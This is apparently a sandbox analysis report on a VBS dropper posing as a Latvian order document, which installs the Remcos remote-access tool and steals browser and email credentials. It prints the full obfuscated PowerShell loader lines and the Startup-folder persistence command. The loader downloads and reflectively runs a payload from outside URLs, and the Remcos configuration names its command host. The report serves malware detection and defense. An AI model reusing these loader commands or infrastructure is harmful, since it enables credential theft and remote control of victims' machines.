Analysis
-
max time kernel
149s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-09-2024 12:01
Static task
static1
Behavioral task
behavioral1
Sample
PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs
Resource
win10v2004-20240802-en
General
-
Target
PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs
-
Size
502KB
-
MD5
054770dd0e6f86d42f8df6f72265375b
-
SHA1
bd012509b749be9acc1dd0a67b8519dedaf1c680
-
SHA256
0a6ec56a9d84def4f2898df242f92e2aa9cf1bdf0d32bc0b710f4106bc3de651
-
SHA512
4b2777eb1ff628dfa9f378879828b4d4f4ae19386108de94584683c2173b70e7347da1d55a8be19bf146576e36f3e6ea70c50ab78aed69689ea8ebf2b71ca9c8
-
SSDEEP
12288:i6tQjLe5sR1aZdlZ7LVSFOzV3JMGeLF8azIdzzEV3J2m2Fjc1AkhbhBs3r:dY2SyPEED
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Extracted
remcos
444
ella666.duckdns.org:3131
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-T559ZO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/3640-67-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2324-65-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/2448-71-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2448-71-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2324-65-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 2 IoCs
flow pid Process 20 5032 powershell.exe 39 5032 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3092 powershell.exe 5032 powershell.exe 2504 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\descravizar.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\descravizar.vbs WScript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 5032 set thread context of 2356 5032 powershell.exe 108 PID 2356 set thread context of 2324 2356 RegAsm.exe 111 PID 2356 set thread context of 2448 2356 RegAsm.exe 112 PID 2356 set thread context of 3640 2356 RegAsm.exe 113 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5084 cmd.exe 4700 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4700 PING.EXE -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 2504 powershell.exe 2504 powershell.exe 2504 powershell.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 5032 powershell.exe 5032 powershell.exe 5032 powershell.exe 2324 RegAsm.exe 2324 RegAsm.exe 3640 RegAsm.exe 3640 RegAsm.exe 2324 RegAsm.exe 2324 RegAsm.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 2356 RegAsm.exe 2356 RegAsm.exe 2356 RegAsm.exe 2356 RegAsm.exe 2356 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2504 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 3640 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2356 RegAsm.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1852 wrote to memory of 5084 1852 WScript.exe 91 PID 1852 wrote to memory of 5084 1852 WScript.exe 91 PID 5084 wrote to memory of 4700 5084 cmd.exe 93 PID 5084 wrote to memory of 4700 5084 cmd.exe 93 PID 5084 wrote to memory of 2504 5084 cmd.exe 100 PID 5084 wrote to memory of 2504 5084 cmd.exe 100 PID 1852 wrote to memory of 3092 1852 WScript.exe 103 PID 1852 wrote to memory of 3092 1852 WScript.exe 103 PID 3092 wrote to memory of 5032 3092 powershell.exe 105 PID 3092 wrote to memory of 5032 3092 powershell.exe 105 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 5032 wrote to memory of 2356 5032 powershell.exe 108 PID 2356 wrote to memory of 4936 2356 RegAsm.exe 109 PID 2356 wrote to memory of 4936 2356 RegAsm.exe 109 PID 2356 wrote to memory of 4936 2356 RegAsm.exe 109 PID 2356 wrote to memory of 900 2356 RegAsm.exe 110 PID 2356 wrote to memory of 900 2356 RegAsm.exe 110 PID 2356 wrote to memory of 900 2356 RegAsm.exe 110 PID 2356 wrote to memory of 2324 2356 RegAsm.exe 111 PID 2356 wrote to memory of 2324 2356 RegAsm.exe 111 PID 2356 wrote to memory of 2324 2356 RegAsm.exe 111 PID 2356 wrote to memory of 2324 2356 RegAsm.exe 111 PID 2356 wrote to memory of 2448 2356 RegAsm.exe 112 PID 2356 wrote to memory of 2448 2356 RegAsm.exe 112 PID 2356 wrote to memory of 2448 2356 RegAsm.exe 112 PID 2356 wrote to memory of 2448 2356 RegAsm.exe 112 PID 2356 wrote to memory of 3640 2356 RegAsm.exe 113 PID 2356 wrote to memory of 3640 2356 RegAsm.exe 113 PID 2356 wrote to memory of 3640 2356 RegAsm.exe 113 PID 2356 wrote to memory of 3640 2356 RegAsm.exe 113
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.razivarcsed.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.razivarcsed.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNnZndScrJ3JsJysnID0gJysnWlJ4aHR0cHM6Ly9pYTYwMDEnKycwMCcrJy51Jysncy5hcmNoaXZlLm9yJysnZy8nKycyNC9pdGVtJysncy9kZXRhaC1ub3RlLXYvJysnRGV0JysnYWgnKydObycrJ3RlVi50eHRaUng7NnZnYmEnKydzZTY0Q29udGVudCA9IChOJysnZXctTycrJ2JqJysnZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZScrJ250KS5Eb3dubG9hZFN0cmluZygnKyc2dmd1cmwpOzZ2ZycrJ2JpbmFyJysneUMnKydvbnRlbicrJ3QgPSBbU3lzJysndGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0UycrJ3RyaW4nKydnKCcrJzZ2Z2JhJysnc2U2NENvJysnbicrJ3RlJysnbnQpOycrJzZ2Z2Fzc2VtYmx5JysnID0gW1JlZmxlY3RpbycrJ24nKycuQXNzZW1iJysnbCcrJ3ldJysnOicrJzpMb2FkKDZ2JysnZ2JpbmFyJysneUMnKydvbnRlJysnbicrJ3QpJysnOzYnKyd2Z3QnKyd5cCcrJ2UgPSA2dmdhc3NlbWJseS5HZXRUJysneXBlKFpSeFJ1blBFJysnLkhvbWVaJysnUngpOzZ2Z21ldGhvZCA9IDYnKyd2Z3QnKyd5JysncGUnKycuR2V0JysnTWV0aG9kKFpSeFZBSVpSeCknKyc7NnZnbWV0aG9kLkludm9rZSg2dmdudWxsLCBbb2InKydqJysnZWN0WycrJ10nKyddJysnQCcrJyhaUngwLycrJ3Z1bycrJ29oL2QvZScrJ2UuZXQnKydzYXAnKycvLycrJzpzcHR0aFpSJysneCAsIFonKydSeCcrJ2Rlc2F0aScrJ3ZhJysnZG8nKydaJysnUngnKycgLCBaUnhkZXNhdGl2YWRvWlJ4ICcrJywgWicrJ1J4ZGVzYScrJ3RpdmFkb1pSeCcrJywnKydaUnhSZScrJ2dBc21aUngsWlJ4WicrJ1J4KSknKSAtcmVwTEFDZShbQ0hhUl05MCtbQ0hhUl04MitbQ0hhUl0xMjApLFtDSGFSXTM5LXJlcExBQ2UgKFtDSGFSXTU0K1tDSGFSXTExOCtbQ0hhUl0xMDMpLFtDSGFSXTM2KXwmKCAkZW52OkNPTXNQRWNbNCwxNSwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('6vgu'+'rl'+' = '+'ZRxhttps://ia6001'+'00'+'.u'+'s.archive.or'+'g/'+'24/item'+'s/detah-note-v/'+'Det'+'ah'+'No'+'teV.txtZRx;6vgba'+'se64Content = (N'+'ew-O'+'bj'+'ect System.Net.WebClie'+'nt).DownloadString('+'6vgurl);6vg'+'binar'+'yC'+'onten'+'t = [Sys'+'te'+'m.Convert]::FromBase64S'+'trin'+'g('+'6vgba'+'se64Co'+'n'+'te'+'nt);'+'6vgassembly'+' = [Reflectio'+'n'+'.Assemb'+'l'+'y]'+':'+':Load(6v'+'gbinar'+'yC'+'onte'+'n'+'t)'+';6'+'vgt'+'yp'+'e = 6vgassembly.GetT'+'ype(ZRxRunPE'+'.HomeZ'+'Rx);6vgmethod = 6'+'vgt'+'y'+'pe'+'.Get'+'Method(ZRxVAIZRx)'+';6vgmethod.Invoke(6vgnull, [ob'+'j'+'ect['+']'+']'+'@'+'(ZRx0/'+'vuo'+'oh/d/e'+'e.et'+'sap'+'//'+':sptthZR'+'x , Z'+'Rx'+'desati'+'va'+'do'+'Z'+'Rx'+' , ZRxdesativadoZRx '+', Z'+'Rxdesa'+'tivadoZRx'+','+'ZRxRe'+'gAsmZRx,ZRxZ'+'Rx))') -repLACe([CHaR]90+[CHaR]82+[CHaR]120),[CHaR]39-repLACe ([CHaR]54+[CHaR]118+[CHaR]103),[CHaR]36)|&( $env:COMsPEc[4,15,25]-jOiN'')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ztwoeflx"5⤵PID:4936
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ztwoeflx"5⤵PID:900
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ztwoeflx"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\bvbzfxwyxdsp"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mpgrgqhsllkuxwm"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4160,i,4356837537417149674,16553092232944545509,262144 --variations-seed-version --mojo-platform-channel-handle=3888 /prefetch:81⤵PID:5036
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5fad65ad1ccd5c4288a9e99a872d780b0
SHA11992b20943380ea5c09e70895886b294cc612e39
SHA2560aa9d69adf7ccdcc2362739cceecbf23999d0c21b5cfc4821b9f03b4ac832f03
SHA51298a6504d47588a9a7155bf4757bbaaef094f10fb138142b10a7e1109163fa14c8f8c6cabe8a81a071f096961db233184fd2fb0adc7db6cc88d859c87cb507584
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
64B
MD511caa8db014785ad78b1031f4a167f3d
SHA1a91bccb9eaffff8958b2a98d675d619a6c1ea30c
SHA256e0de8d3cfb7585ac4273c25093c8f7537d452e6e9dd017c1675153649e9f137a
SHA5126d1bf176a6a1cfef1c524bef5e51e4b0af18ff5f279970474cdd651c1b5ee9cbbb27bc51e1acfa625decec72ed7d747c67daee8c4e988732401601b4c1617f5f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5cda83eba5a004554ccdc061fd3df499c
SHA158ff2ecb9d47be10335e104896c87c62dc328523
SHA256e384f4d46587646c6e0f9d2ee90b7bc57b49cea936b37cf8ab81ef3c4ce468ac
SHA512f55ce20f0cf8b603fad765b889607f967c22d377fa4ac417ba1309d0aced9231e197bb4107d1c92bb99f51c04cc68ce26148727a8b694886710100c01f3de597